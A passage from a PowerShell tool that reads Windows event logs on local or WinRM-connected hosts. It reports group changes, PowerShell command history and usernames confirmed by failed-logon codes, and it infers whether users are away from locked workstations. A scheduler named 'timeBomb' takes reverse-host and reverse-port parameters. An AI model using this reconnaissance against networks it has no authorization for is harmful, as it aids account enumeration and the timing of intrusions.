- A member was removed from a security-enabled universal group" 634 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4757 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountName";Expression={$_.ReplacementStrings[6]}},@{Name="Added User SPN";Expression={$_.ReplacementStrings[0]}},@{Name="Added User SID";Expression={$_.ReplacementStrings[1]}},@{Name="GroupName";Expression={$_.ReplacementStrings[2]}},@{Name="Group SID";Expression={$_.ReplacementStrings[4]}} 635 | 636 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (5136) - A Directory Process Object was Modified" 637 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 5136 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="AccountToObject";Expression={$_.ReplacementStrings[3]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Object";Expression={$_.ReplacementStrings[8]}},@{Name="ObjectGUID";Expression={$_.ReplacementStrings[9]}},@{Name="Class";Expression={$_.ReplacementStrings[10]}},@{Name="Type";Expression={$_.ReplacementStrings[14]}},@{Name="LDAP Display Name";Expression={$_.ReplacementStrings[11]}},@{Name="LDAP Value";Expression={$_.ReplacementStrings[13]}} 638 | 639 | $event4728_29_array=@(4728,4729) 640 | foreach($event4728_29 in $event4728_29_array) 641 | { 642 | if($event4728_29 -eq 4728) 643 | { 644 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4728) - A member was added to a security-enabled global group" 645 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4728 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Added to Security 
Group";Expression={$_.ReplacementStrings[2]}} 646 | } 647 | else 648 | { 649 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4729) - A member was removed from a security-enabled global group" 650 | $groupHistory=Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4729 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Security ID ";Expression={$_.ReplacementStrings[1]}}, @{Name="Removed from a Security Group";Expression={$_.ReplacementStrings[2]}} 651 | 652 | } 653 | $groupUsers=$groupHistory | Group-Object {$_."Account Name"} | Select -Property name,group 654 | 655 | $mySIDarray=New-Object System.Collections.ArrayList 656 | 657 | #Add unique SIDs to array 658 | for($sidcounter=0;$sidcounter -lt $groupHistory.length; $sidcounter++) 659 | { 660 | if($mySIDarray -notcontains ($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") 661 | { 662 | #https://learn-powershell.net/2014/09/13/quick-hits-sending-data-to-null/ 663 | $mySIDarray.add(($groupHistory[$sidcounter] | Select -Property "Security ID ")."Security ID ") | Out-Null 664 | } 665 | } 666 | 667 | for($c=0;$c -lt $groupUsers.length;$c++) 668 | { 669 | 670 | $userscn=$groupUsers[$c].Name 671 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Enumerating $userscn group history" 672 | $groupHistory | Group-Object {$_."Account Name"} | Where-object {$_.Name -match "$userscn"} | %{$_.Group} | Format-Table #| Select -Property "Added to Security Group" 673 | Write-Output "`n" 674 | Write-Host "[*] " -ForegroundColor Yellow -Nonewline; Write-Output "Extra Information ..." 
675 | #Convert SID to username and get user groups,comments 676 | $userSID=$mySIDarray[$c] 677 | $accountName=([wmi]"win32_SID.SID='$userSID'").AccountName 678 | $userBelongToGroups=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String "Global Group"} 679 | $userComment=Invoke-Command -ScriptBlock {net user $accountName /domain | Select-String -Pattern "^comment"} 680 | Write-Output "Username> $accountName" 681 | Write-Host "[!] User is currently belong to> $userBelongToGroups" -ForegroundColor Green 682 | Write-Host "$userComment" -ForegroundColor Red 683 | Write-Output "`n" 684 | 685 | } 686 | } 687 | 688 | $event400_600_array=@(400,600) 689 | foreach($event400_600 in $event400_600_array) 690 | { 691 | if($event400_600 -eq 400) 692 | { 693 | 694 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (400) - Windows PowerShell" 695 | Write-Output "`n" 696 | } 697 | else 698 | { 699 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (600) - Windows PowerShell" 700 | Write-Output "`n" 701 | } 702 | 703 | try 704 | { 705 | $get400_600=Get-EventLog -Newest $using:newest -InstanceId $event400_600 -LogName "Windows Powershell" | select TimeGenerated,@{Name="HostApplication";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,HostApplication 706 | if(($get400_600 | Measure-Object).count -gt 0) 707 | { 708 | $timeGenerated=($get400_600.TimeGenerated).DateTime 709 | $hostApplication=($get400_600.HostApplication | findstr -i "HostApplication") 710 | $engineVersion=($get400_600.HostApplication | findstr -i "EngineVersion") 711 | #$hostPSVersion=Get-Host | Select Version 712 | 713 | 714 | for($c=0;$c -lt $get400_600.length;$c++) 715 | { 716 | if($hostApplication[$c].Split("=") -ne "") 717 | { 718 | Write-Host $timeGenerated[$c] 719 | #Write-Host "Host PowerShell: "$hostPSVersion.Version 720 | Write-Host $hostApplication[$c].Split("=")[1] 721 | 
if($engineVersion[$c].split("=")[1] -eq "") 722 | { 723 | Write-Host "Command PS Version: -" 724 | } 725 | else 726 | { 727 | Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1] 728 | } 729 | Write-Output "`n" 730 | 731 | } 732 | 733 | } 734 | } 735 | } 736 | catch 737 | { 738 | <# Try/Catch Event 400/600#> 739 | } 740 | 741 | } 742 | 743 | 744 | $event500_501_array=@(500,501) 745 | foreach($event500_501 in $event500_501_array) 746 | { 747 | if($event500_501 -eq 500) 748 | { 749 | 750 | $event500_501=500 751 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (500) - Windows PowerShell" 752 | Write-Output "`n" 753 | } 754 | else 755 | { 756 | $event500_501=501 757 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (501) - Windows PowerShell" 758 | Write-Output "`n" 759 | } 760 | 761 | try 762 | { 763 | $get500_501=Get-EventLog -Newest $newest -InstanceId $event500_501 -LogName "Windows Powershell" | select TimeGenerated,PSComputerName,@{Name="Command";Expression={$_.ReplacementStrings[2]}} | select TimeGenerated,PSComputerName,Command 764 | if(($get500_501 | Measure-Object).count -gt 0) 765 | { 766 | $timeGenerated=($get500_501 | Select TimeGenerated) 767 | #$psComputerName=$get500_501.PsComputerName 768 | $commandPath=($get500_501 | Select Command) | format-List | findstr -i "CommandPath" 769 | $commandName=($get500_501 | Select Command) | format-List | findstr -i "CommandName" 770 | $commandType=($get500_501 | Select Command) | format-List | findstr -i "CommandType" 771 | $commandLine=($get500_501 | Select Command) | format-List | findstr -i "CommandLine" 772 | $engineVersion=($get500_501 | Select Command) | format-list | findstr -i "EngineVersion" 773 | #$hostPSVersion=Get-Host | Select Version 774 | 775 | 776 | for($c=0;$c -lt $get500_501.length;$c++) 777 | { 778 | if($commandLine[$c].Split("=") -ne "") 779 | { 780 | Write-Host $timeGenerated[$c] 781 | #Write-Host 
$psComputerName[$c] 782 | if($commandName[$c].split("=")[1] -eq ""){Write-Host "CommandName: -"}else{Write-Host "CommandName: "$commandName[$c].split("=")[1].Trim(" ")} 783 | if($commandType[$c].split("=")[1] -eq ""){Write-Host "CommandType: -"}else{Write-Host "CommandType: "$commandType[$c].split("=")[1].Trim(" ")} 784 | if($commandPath[$c].split("=")[1] -eq ""){Write-Host "CommandPath: -"}else{Write-Host "CommandPath: "$commandPath[$c].split("=")[1].Trim(" ")} 785 | if($commandLine[$c].split("=")[1] -eq ""){Write-Host "CommandLine: -"}else{Write-Host "CommandLine: "($commandLine[$c].split("=")[1]).Trim(" ")} 786 | if($engineVersion[$c].split("=")[1] -eq ""){Write-Host "Command PS Version: -"}else{Write-Host "Command PS Version:"$engineVersion[$c].split("=")[1]} 787 | Write-Output "`n" 788 | 789 | } 790 | 791 | } 792 | } 793 | 794 | 795 | } 796 | catch 797 | { 798 | <# Try/Catch event 500/501#> 799 | } 800 | 801 | } 802 | 803 | 804 | }<#### All event logs query just finished #####> 805 | 806 | #Display unique accounts for event 4624,4625,4776 807 | if($using:users) 808 | { 809 | 810 | if($using:eventID -eq 4624) 811 | { 812 | 813 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4624 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Usernames";Expression={$_.ReplacementStrings[5]}} | Group-Object 'Usernames' | Format-Table @{L='Valid Usernames';E={$_.Name}} 814 | #Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[5]}},@{Label="Status";Expression={if($_.ReplacementStrings[9] -eq "0xC0000064") { "Username doesn't exist!"} elseif ($_.ReplacementStrings[9] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000072") {"User is currently disabled!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000234") {"User is currently 
Locked Out!"} }} | Group-Object Username,Status | Format-Table -Property Name 815 | 816 | } 817 | elseif($using:eventID -eq 4625) 818 | { 819 | 820 | 821 | #Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[5]}},@{Label="Status";Expression={if($_.ReplacementStrings[9] -eq "0xC0000064") { "Username doesn't exist!"} elseif ($_.ReplacementStrings[9] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000072") {"User is currently disabled!"} elseif ($_.ReplacementStrings[9] -eq "0xC0000234") {"User is currently Locked Out!"} }} | Group-Object Username,Status | Format-Table -Property Name 822 | 823 | #Print only valid usernames 824 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[5]}},@{Label="Status";Expression={if($_.ReplacementStrings[9] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} }} | Where-Object {$_.Status -eq "Username is correct but the Password is wrong!"} | Group-Object Username | Format-Table @{L='Valid Usernames';E={$_.Name}} 825 | } 826 | else 827 | { 828 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4776 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property @{Label="Username";Expression={$_.ReplacementStrings[1]}},@{Label="Error Type";Expression={$_.ReplacementStrings[3]}},@{Label="Status";Expression={if($_.ReplacementStrings[3] -eq "0xC0000064") { "Username doesn't exist!"} elseif($_.ReplacementStrings[3] -eq "0x0") { "Successful Authentication"} elseif ($_.ReplacementStrings[3] -eq "0xC000006A") {"Username is correct but the Password is wrong!"} elseif ($_.ReplacementStrings[3] -eq "0xC0000072") {"User is currently disabled!"} elseif 
($_.ReplacementStrings[3] -eq "0xC0000234") {"User is currently Locked Out!"} }} | Group-Object Username,'Error Type',Status | Format-Table @{L='User information';E={$_.Name}} 829 | } 830 | 831 | 832 | 833 | } 834 | 835 | } 836 | 837 | 838 | 839 | 840 | function testConnectivity($ip,$port) 841 | { 842 | 843 | 844 | if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) 845 | { 846 | try 847 | { 848 | $socket=new-object System.Net.Sockets.TcpClient($ip,$port) 849 | } 850 | catch 851 | { 852 | <# Nothing Here#> 853 | Write-Output "Port $port is closed!" 854 | } 855 | } 856 | 857 | if($socket.Connected) 858 | { 859 | 860 | 861 | Write-Output "Port $port is open!!" 862 | $socket.close() 863 | } 864 | 865 | 866 | } 867 | 868 | 869 | <# https://sion-it.co.uk/tech/powershell/loop-until-a-certain-time/ #> 870 | function timeBomb 871 | { 872 | [CmdletBinding()] 873 | Param([string]$task,[datetime]$at,[int]$loop,[datetime]$stoptime,[string]$newest,[string]$ip,[string]$reverseHost,[int]$reversePort) 874 | 875 | $currentTime=Get-Date 876 | [datetime]$p=$currentTime 877 | 878 | if($task -eq "now") 879 | { 880 | 881 | if($ip -match "127.0.0.1") 882 | { 883 | Invoke-Command -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 884 | } 885 | else 886 | { 887 | 888 | $winrmUniqueSessionsID=Get-PSSession | Get-Unique 889 | for($x=0;$x -le ($winrmUniqueSessionsID).length;$x++) 890 | { 891 | #Check if WinRM Table is not null 892 | if($winrmUniqueSessionsID[$x]) 893 | { 894 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessionsID[$x].id) -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 895 | } 896 | } 897 | 898 | 899 | } 900 | 901 | } 902 | elseif($task -eq "once") 903 | { 904 | 905 | 906 | $remaingMinutes=($at-(Get-Date)).Minutes 907 | $remaingSeconds=($at-(Get-Date)).Seconds 908 | 909 | 910 | if($ip -match '127.0.0.1') 911 | { 912 | 913 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 914 | Write-Host "[+] Left 
$remaingMinutes minute(s) for your task" -ForegroundColor Green 915 | Start-Sleep -Seconds (60*$remaingMinutes) 916 | Invoke-Command -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 917 | 918 | } 919 | else 920 | { 921 | 922 | #Get-PSSession 923 | #[int]$winrmSessionsID=Read-Host -Prompt "Give session id to retrieve open WinRM connections" 924 | Write-Output "`n" 925 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 926 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 927 | Start-Sleep -Seconds (60*$remaingMinutes) 928 | $winrmUniqueSessionsID=Get-PSSession | Get-Unique 929 | for($x=0;$x -le ($winrmUniqueSessionsID).length;$x++) 930 | { 931 | if($winrmUniqueSessionsID[$x]) 932 | { 933 | 934 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessionsID[$x].id) -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 935 | } 936 | 937 | } 938 | } 939 | 940 | } 941 | elseif($task -eq "trigger") 942 | { 943 | 944 | if($at -and $loop -and $stoptime) 945 | { 946 | [datetime]$TimeStart = $at 947 | [datetime]$TimeEnd = $stoptime.addminutes($loop) 948 | Write-Host "Start Time: $TimeStart" 949 | write-host "End Time: $TimeEnd" 950 | 951 | $now=Get-Date 952 | while($now -lt $at) 953 | { 954 | $now=Get-Date 955 | Start-Sleep -Seconds 10 956 | } 957 | #setup loop 958 | 959 | 960 | do 961 | { 962 | $TimeNow = Get-Date 963 | if ($TimeNow -ge $TimeEnd) 964 | { 965 | Write-host "It's time to finish." 
966 | } 967 | else 968 | { 969 | 970 | if($ip -match '127.0.0.1') 971 | { 972 | 973 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 974 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 975 | Start-Sleep -Seconds (60*$remaingMinutes) 976 | Invoke-Command -ScriptBlock ${function:checkLogOf} -ArgumentList $newest,$pythonconnectback 977 | 978 | } 979 | else 980 | { 981 | 982 | #Get-PSSession 983 | #[int]$winrmSessionsID=Read-Host -Prompt "Give session id to retrieve open WinRM connections" 984 | Write-Output "`n" 985 | Write-Host "[+] Task started at>"(Get-Date) -ForegroundColor Yellow 986 | Write-Host "[+] Left $remaingMinutes minute(s) for your task" -ForegroundColor Green 987 | Start-Sleep -Seconds (60*$remaingMinutes) 988 | $winrmUniqueSessionsID=Get-PSSession | Get-Unique 989 | for($x=0;$x -le ($winrmUniqueSessionsID).length;$x++) 990 | { 991 | if($winrmUniqueSessionsID[$x]) 992 | { 993 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessionsID[$x].id) -ScriptBlock ${function:checkLogOf} -ArgumentList $newest 994 | } 995 | 996 | } 997 | } 998 | 999 | 1000 | } 1001 | 1002 | $delay=$loop*(60/1) #convert minutes to seconds 1003 | Start-Sleep -Seconds $delay 1004 | } 1005 | until ($TimeNow -ge $TimeEnd) 1006 | 1007 | 1008 | 1009 | } 1010 | else 1011 | { 1012 | Write-Host "[-] You need at/loop/stoptime flags" -ForegroundColor Yellow 1013 | } 1014 | 1015 | 1016 | } 1017 | 1018 | } 1019 | 1020 | 1021 | function checkLogOf($newest) 1022 | { 1023 | 1024 | 1025 | #[array]$hostUsers= Get-ChildItem -Path "c:\users" | %{$_.Name} 1026 | Write-Host "[!] " -ForegroundColor Green -NoNewline; Write-Host "Enumerating users ..." 
1027 | [array]$hostUsers=Get-ChildItem 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\ProfileList' | ForEach-Object { $_.GetValue('ProfileImagePath') } | Where-Object {$_ -match "c:\\users"} | Where-Object {$_ -match "c:\\users"} | foreach {( $_ -split "c:\\users\\")[1]} 1028 | Write-Host "[!] " -ForegroundColor Green -NoNewline; Write-Host "Doing some checks ..." 1029 | $auditPolPath="c:\windows\temp\Auditpol.csv" 1030 | 1031 | #check if auditpol.csv exists, if yes remove it 1032 | if([System.IO.File]::Exists($auditPolPath)) 1033 | { 1034 | Remove-Item -Path $auditPolPath 1035 | $exportPolicy=Invoke-Command -ScriptBlock {auditpol /backup /file:$auditPolPath} 1036 | #$exportPolicy=Invoke-Expression -Command "c:\windows\system32\cmd.exe /c auditpol /backup /file:$auditPolPath" 1037 | } 1038 | else 1039 | { 1040 | $exportPolicy=Invoke-Command -ScriptBlock {auditpol /backup /file:$auditPolPath} 1041 | 1042 | 1043 | } 1044 | $readPolicyContents=Get-content $auditPolPath 1045 | $policyContentsArray=($readPolicyContents | Select-String "Account Lockout") -split "," 1046 | #Validate that events 4800/4801, 4802/4803 exists 1047 | if(($policyContentsArray | Select-String -Pattern "Success|Failure")) 1048 | { 1049 | #Lockout Policy exists 1050 | Write-Host "[+] " -foregroundcolor Green -Nonewline;Write-Host "Lockout policy found ..." 1051 | Write-Output "`n" 1052 | } 1053 | else 1054 | { 1055 | Write-Host "[-] " -foregroundcolor Yellow -Nonewline; Write-Host "Lockout Policy not found ..." 
1056 | Write-Output "`n" 1057 | } 1058 | 1059 | 1060 | #check if events 4800/4801, 4802/4803 exists, if yes add to eventArray 1061 | $eventArray = New-Object System.Collections.ArrayList 1062 | 1063 | for($usercounter=0;$usercounter -lt $hostUsers.Length;$usercounter++) 1064 | { 1065 | $currentUser=$hostUsers[$usercounter] 1066 | try 1067 | { 1068 | $results4800_1=Get-EventLog -LogName Security -Instanceid 4800 -ErrorAction stop | Where {$_.message -match "Account Name:\s*$currentUser"} 1069 | if($results4800_1) 1070 | { 1071 | #check if $eventArray contains 4800, if not then added 1072 | if(!$eventArray.Contains(4800)) 1073 | { 1074 | $eventArray.add(4800) | Out-Null 1075 | } 1076 | } 1077 | 1078 | } 1079 | catch 1080 | { 1081 | Write-Host "[-] " -ForegroundColor Red -NoNewline; Write-Host "No logs found for user $currentUser / eventID 4800/4801" 1082 | } 1083 | 1084 | try 1085 | { 1086 | $results4802_3=Get-EventLog -LogName Security -Instanceid 4802 -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} 1087 | 1088 | if($results4802_3) 1089 | { 1090 | #check if $eventArray 4802, if not then added 1091 | if(!$eventArray.contains(4802)) 1092 | { 1093 | $eventArray.add(4802) | Out-Null 1094 | } 1095 | } 1096 | 1097 | } 1098 | catch 1099 | { 1100 | Write-Host "[-] " -ForegroundColor Red -Nonewline; Write-Host "No logs found for user $currentUser / eventID 4802/4803" 1101 | write-output "`n" 1102 | } 1103 | 1104 | 1105 | 1106 | 1107 | } 1108 | 1109 | 1110 | $events = New-Object System.Collections.ArrayList 1111 | 1112 | 1113 | #In try block check if "newest" number is more than existing log files. 
1114 | #try 1115 | #{ 1116 | for($usercounter=0;$usercounter -lt $hostUsers.Length;$usercounter++) 1117 | {#1 1118 | 1119 | 1120 | $currentUser=$hostUsers[$usercounter] 1121 | #-after ([datetime]::Today) 1122 | try 1123 | { 1124 | 1125 | $lastloggof=Get-EventLog -LogName Security -Instanceid 4647 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1126 | #$lastloggof 1127 | if(!$lastloggof) 1128 | { 1129 | $lastloggof="" 1130 | } 1131 | 1132 | } 1133 | catch 1134 | { 1135 | Write-Host "[-] " -ForegroundColor Red -Nonewline; Write-Host "No logs found for user $currentUser / eventID 4647" 1136 | 1137 | } 1138 | 1139 | try 1140 | { 1141 | 1142 | $lastloggon=Get-EventLog -LogName Security -Instanceid 4624 -newest $newest -ErrorAction stop | Where {($_.message -match "Account Name:\s*$currentUser") -and ($_.message -notmatch "Security ID:\s*S-1-0-0")} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}} | Select-Object -first 1 1143 | if(!$lastloggon) 1144 | { 1145 | $lastloggon="" 1146 | } 1147 | 1148 | } 1149 | catch 1150 | { 1151 | 1152 | Write-Host "[-] " -ForegroundColor Red -NoNewline; Write-Host "logs found for user $currentUser / eventID 4624" 1153 | } 1154 | 1155 | 1156 | 1157 | #check if lastloggof,lastloggon is null before converting to datetime 1158 | if(($lastloggof -and $lastloggon) -ne "") 1159 | {#2 1160 | #Convert to datetime 1161 | [datetime]$lastloggof1=$lastloggof.TimeGenerated 1162 | [datetime]$lastloggon1=$lastloggon.TimeGenerated 1163 | $userlogofStateCalc=$lastloggon1-$lastloggof1 1164 | 1165 | #Check if user is logged on 1166 | [float]$logoftotalMilliseconds=$userlogofStateCalc.TotalMilliseconds 1167 | #Write-Host "[!] " -ForegroundColor Green -NoNewline;Write-Host "Checking Logof events ..." 
1168 | if($logoftotalMilliseconds -ge 0) 1169 | {#3 1170 | 1171 | 1172 | #Write-Host "[!] User $currentUser is logged on" -ForegroundColor Yellow 1173 | $events.Clear() 1174 | for($x=0;$x -lt $eventArray.count;$x++) 1175 | {#3.5 1176 | 1177 | 1178 | ($events.Add((Get-EventLog -LogName Security -Instanceid $eventArray[$x] -newest $newest | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1).TimeGenerated)) | Out-Null 1179 | 1180 | ($events.Add((Get-EventLog -LogName Security -Instanceid ($eventArray[$x]+1) -newest $newest | Where {($_.message -match "Account Name:\s*$currentUser") -and ($_.message -notmatch "Security ID:\s*S-1-0-0")} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}} | Select-Object -first 1).TimeGenerated)) | Out-Null 1181 | 1182 | 1183 | #check if the event is 4800/4801 or 4802/4803 1184 | #################################################################################################################################################################### 1185 | if($eventArray[$x] -eq 4800) 1186 | {#4 1187 | 1188 | $userlockoutStateCalc2=$events[3]-$events[2] 1189 | [float]$lockouttotalMilliseconds2=$userlockoutStateCalc2.TotalMilliseconds 1190 | 1191 | if($lockouttotalMilliseconds2 -ge 0) 1192 | {#5 1193 | 1194 | #write-Host "[-] The screen saver is dismissed -"$eventArray[$x]"/"($eventArray[$x]+1)"event IDs" -ForegroundColor Yellow 1195 | #write-Host "[-] The screen saver is dismissed" -ForegroundColor Yellow 1196 | <#SCREENSAVER OUTPUT / NOTHING HERE#> 1197 | 1198 | 1199 | $userlockoutStateCalc=$events[1]-$events[0] 1200 | [float]$lockouttotalMilliseconds=$userlockoutStateCalc.TotalMilliseconds 1201 | 1202 | if($lockouttotalMilliseconds -ge 0) 1203 | {#6 1204 | 1205 | #write-Host "[-] The workstation is unlocked -"$eventArray[$x]"/"($eventArray[$x]+1)"event IDs" 
-ForegroundColor Yellow 1206 | #write-Host "[-] The workstation is unlocked" -ForegroundColor Yellow 1207 | 1208 | #4779->A session was disconnected from a Window Station 1209 | try 1210 | { 1211 | $getLast4779 = Get-EventLog -LogName Security -Instanceid 4779 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1212 | } 1213 | catch 1214 | { 1215 | try 1216 | { 1217 | $getLast4779_count=(Get-EventLog -LogName Security -Instanceid 4779 -ErrorAction Stop).Count 1218 | } 1219 | catch 1220 | { 1221 | $getLast4779_count = 0 1222 | } 1223 | Write-Host "[-] " -ForegroundColor Red -NoNewline;Write-Host "You enter $newest but eventID-4779 has $getLast4779_count entries" 1224 | Write-Output "`n" 1225 | } 1226 | 1227 | #4768->A Kerberos authentication ticket (TGT) was requested 1228 | try 1229 | { 1230 | $getLast4768 = Get-EventLog -LogName Security -Instanceid 4768 -newest $newest -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Client Address";Expression={$_.ReplacementStrings[9]}},@{Name="Client Port";Expression={$_.ReplacementStrings[10]}} | Select-Object -first 1 1231 | } 1232 | catch 1233 | { 1234 | try 1235 | { 1236 | $getLast4768_count=(Get-EventLog -LogName Security -Instanceid 4768 -ErrorAction Stop).Count 1237 | } 1238 | catch 1239 | { 1240 | $getLast4768_count = 0 1241 | } 1242 | Write-Host "[-] " -ForegroundColor Red -NoNewline;Write-Host "You enter $newest but eventID-4768 has $getLast4768_count entries" 1243 | Write-Output "`n" 1244 | } 1245 | 1246 | #4634->An account was logged off 1247 | try 1248 | { 
1249 | $getLast4634 = Get-EventLog -LogName Security -Instanceid 4634 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | Select-Object -First 1 1250 | } 1251 | catch 1252 | { 1253 | try 1254 | { 1255 | $getLast4634_count = (Get-EventLog -LogName Security -Instanceid 4634 -ErrorAction Stop).Count 1256 | } 1257 | catch 1258 | { 1259 | $getLast4634_count = 0 1260 | } 1261 | Write-Host "[-] " -ForegroundColor Red -Nonewline; Write-Host "You enter $newest but eventID-4634 has $getLast4634_count entries" 1262 | Write-Output "`n" 1263 | } 1264 | 1265 | #$getLast4672 = Get-EventLog -LogName Security -Instanceid 4672 -newest $newest | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | select-object -First 1 1266 | #$t4672=$getLast4672.TimeGenerated 1267 | 1268 | #Calculator 1269 | if($getLast4768.TimeGenerated) 1270 | { 1271 | $t4768=$getLast4768.TimeGenerated 1272 | } 1273 | else 1274 | { 1275 | [datetime]$t4768 = 0 1276 | } 1277 | 1278 | if($getLast4634.TimeGenerated) 1279 | { 1280 | 1281 | $t4634=$getLast4634.TimeGenerated 1282 | } 1283 | else 1284 | { 1285 | [datetime]$t4634 = 0 1286 | } 1287 | 1288 | if($getLast4779.TimeGenerated) 1289 | { 1290 | $t4779=$getLast4779.TimeGenerated 1291 | } 1292 | else 1293 | { 1294 | [datetime]$t4779=0 1295 | } 1296 | 1297 | 1298 | $tmpTime = $t4768-$t4779 1299 | $tmpTime2 = $t4768 - $t4634 1300 | 1301 | #Get domain name from the event4779, else use wmi 1302 | if($getLast4779.Domain) 1303 | { 1304 | $domainName=$getLast4779.Domain 1305 | } 1306 | else 1307 | { 1308 | 
$domainName=(Get-WmiObject Win32_ComputerSystem).Domain 1309 | } 1310 | 1311 | 1312 | if($tmpTime.TotalMilliseconds -ge 0) 1313 | {#7 1314 | Write-Host "[-] The Workstation is unlocked | User $domainName\$currentUser is in!" -ForegroundColor Yellow 1315 | #Write-Output "`n" 1316 | } 1317 | else 1318 | { 1319 | Write-Host "[+] The Workstation is locked | User $domainName\$currentUser is in NOT in!" -ForegroundColor Green 1320 | #Write-Output "`n" 1321 | }#7 1322 | 1323 | } 1324 | else 1325 | { 1326 | 1327 | 1328 | #4779->A session was disconnected from a Window Station 1329 | try 1330 | { 1331 | $getLast4779 = Get-EventLog -LogName Security -Instanceid 4779 -newest $newest -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1332 | } 1333 | catch 1334 | { 1335 | try 1336 | { 1337 | $getLast4779_count = (Get-EventLog -LogName Security -Instanceid 4779 -ErrorAction Stop).Count 1338 | } 1339 | catch 1340 | { 1341 | $getLast4779_count = 0 1342 | } 1343 | Write-Host "[-] " -Foregroundcolor Red -Nonewline; Write-Host "You enter $newest but eventID-4779 has $getLast4779_count entries" 1344 | Write-Output "`n" 1345 | } 1346 | 1347 | #4768->A Kerberos authentication ticket (TGT) was requested 1348 | try 1349 | { 1350 | $getLast4768 = Get-EventLog -LogName Security -Instanceid 4768 -newest $newest -ErrorAction Stop| Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property 